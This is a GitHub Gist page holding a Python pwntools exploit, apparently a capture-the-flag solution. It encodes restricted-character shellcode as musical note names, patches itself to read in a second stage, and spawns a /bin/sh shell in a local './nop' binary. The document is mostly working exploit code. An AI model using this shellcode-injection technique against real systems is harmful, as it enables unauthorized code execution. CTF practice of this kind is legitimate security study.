-
-
Save bennofs/64c8198d87ca34cc326fc83ce6190670 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| from pwn import * | |
| context.arch = "i386" | |
| table = {'G#1': 101, 'G#0': 51, 'G#3': 404, 'G#2': 202, 'G#5': 1614, 'G#4': 807, 'G#7': 6456, 'G#6': 3228, 'G#9': 25823, 'G#8': 12912, 'G7': 6094, 'G6': 3047, 'G5': 1524, 'G4': 762, 'G3': 381, 'G2': 191, 'G1': 96, 'G0': 48, 'G9': 24374, 'G8': 12187, 'D#8': 9673, 'D#9': 19346, 'A9': 13680, 'A8': 6840, 'B4': 480, 'B5': 960, 'B6': 1920, 'B7': 3839, 'B0': 30, 'B1': 60, 'B2': 120, 'B3': 240, 'B8': 7678, 'B9': 15355, 'F#0': 45, 'F#1': 90, 'F#2': 180, 'F#3': 360, 'F#4': 719, 'F#5': 1438, 'F#6': 2876, 'F#7': 5752, 'F#8': 11503, 'F#9': 23006, 'E9': 20496, 'E8': 10248, 'E5': 1281, 'E4': 641, 'E7': 5124, 'E6': 2562, 'E1': 81, 'E0': 41, 'E3': 321, 'E2': 161, 'A#3': 227, 'A#2': 114, 'A#1': 57, 'A#0': 29, 'A#7': 3624, 'A#6': 1812, 'A#5': 906, 'A#4': 453, 'A#9': 14493, 'A#8': 7247, 'C9': 16268, 'C8': 8134, 'C3': 255, 'C2': 128, 'C1': 64, 'C0': 32, 'C7': 4067, 'C6': 2034, 'C5': 1017, 'C4': 509, 'F0': 43, 'F1': 85, 'F2': 170, 'F3': 340, 'F4': 679, 'F5': 1358, 'F6': 2715, 'F7': 5429, 'F8': 10858, 'F9': 21715, 'A1': 54, 'A0': 27, 'A3': 214, 'A2': 107, 'A5': 855, 'A4': 428, 'A7': 3420, 'A6': 1710, 'D#6': 2419, 'D#7': 4837, 'D#4': 605, 'D#5': 1210, 'D#2': 152, 'D#3': 303, 'D#0': 38, 'D#1': 76, 'C#9': 17235, 'C#8': 8618, 'C#5': 1078, 'C#4': 539, 'C#7': 4309, 'C#6': 2155, 'C#1': 68, 'C#0': 34, 'C#3': 270, 'C#2': 135, 'D8': 9130, 'D9': 18260, 'D6': 2283, 'D7': 4565, 'D4': 571, 'D5': 1142, 'D2': 143, 'D3': 286, 'D0': 36, 'D1': 72} | |
| def translate_notes(notes): | |
| out = "" | |
| notes = re.sub(r"\s+", "", re.sub(r";.*(\n|$)", "", notes)) | |
| while notes: | |
| if notes[0] == ";": | |
| notes = notes | |
| i = next(i for i in xrange(4) if notes[:i] in table) | |
| out += p16(table[notes[:i]]) | |
| notes = notes[i:] | |
| return out | |
| notes = """ | |
| ; load RAX with 0x4f4f4f4f from stack | |
| A3 F0 | |
| ; xor the next 16 stack bytes with EAX (4 xors) | |
| ; gives 16 byte of cleared stack space, needed later | |
| A 1G0 | |
| G6G6G6G 1G0 | |
| G6G6G6G 1G0 | |
| G6G6G6G 1G0 | |
| ; now xor rax into 0x2f2f2f2f which is the the next value on the stack | |
| G6G6G6G 1G0 | |
| ; clear EAX | |
| A 3F#6 | |
| ; load 2 into AL | |
| A 4A6 A 4C6 | |
| ; xor AL into 0x62626262's bytes | |
| A 0G0 | |
| A 0G2 | |
| A 0G3 | |
| ; load 1 into AL | |
| A 4B 4C6 | |
| ; xor AL into the third byte of our 0x60.. address | |
| A0 G1 | |
| ; clear EAX | |
| A 4A 4B6 | |
| ; load EAX with 0x60606160 (the address we built on the stack) | |
| A 3G0 | |
| ;; now EAX is 0x60606160, an address in the shellcode page | |
| ; clear EDI (first and) | |
| A #8 | |
| ; increment EAX (set AL to 0x61) | |
| A 4B 4C 6 | |
| ; clear EDI (second and) | |
| A #8 | |
| ; set AL to 0x20 (0x20 ^ 0x41 (the pad value) = 0x61 (popad)) | |
| A 4A6 | |
| ; apply patch | |
| A 0D8A6 | |
| ; setup stack for popad | |
| ; (this works because stack space was cleared above so we can use XOR to write values to stack) | |
| F6F6F6F 1F0 ; EDX = EAX (count) | |
| F6F6F6F 1F0 ; ECX = EAX (read target) | |
| A 3F0 A 4A 4B6 ; set EAX to 3 | |
| F6F6F6F 1F0 ; EAX = EAX (syscall number) | |
| ; increment stack pointer so that popad pops correct values+ padding | |
| """ + "D6" * 32 + """ | |
| ; padding (it is important that 'A' & '6' = 0x0 to clear EDI above) | |
| """ + "A6" * 400 | |
| binsh = chr(0x90) * 2000 + asm(shellcraft.sh()) | |
| shellcode = translate_notes(notes) | |
| shellcode += (2992 - len(shellcode)) * p16(table["A6"]) | |
| write("out", shellcode + binsh) | |
| r = process("./nop") | |
| r.sendafter("sound?", shellcode + binsh) | |
| r.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment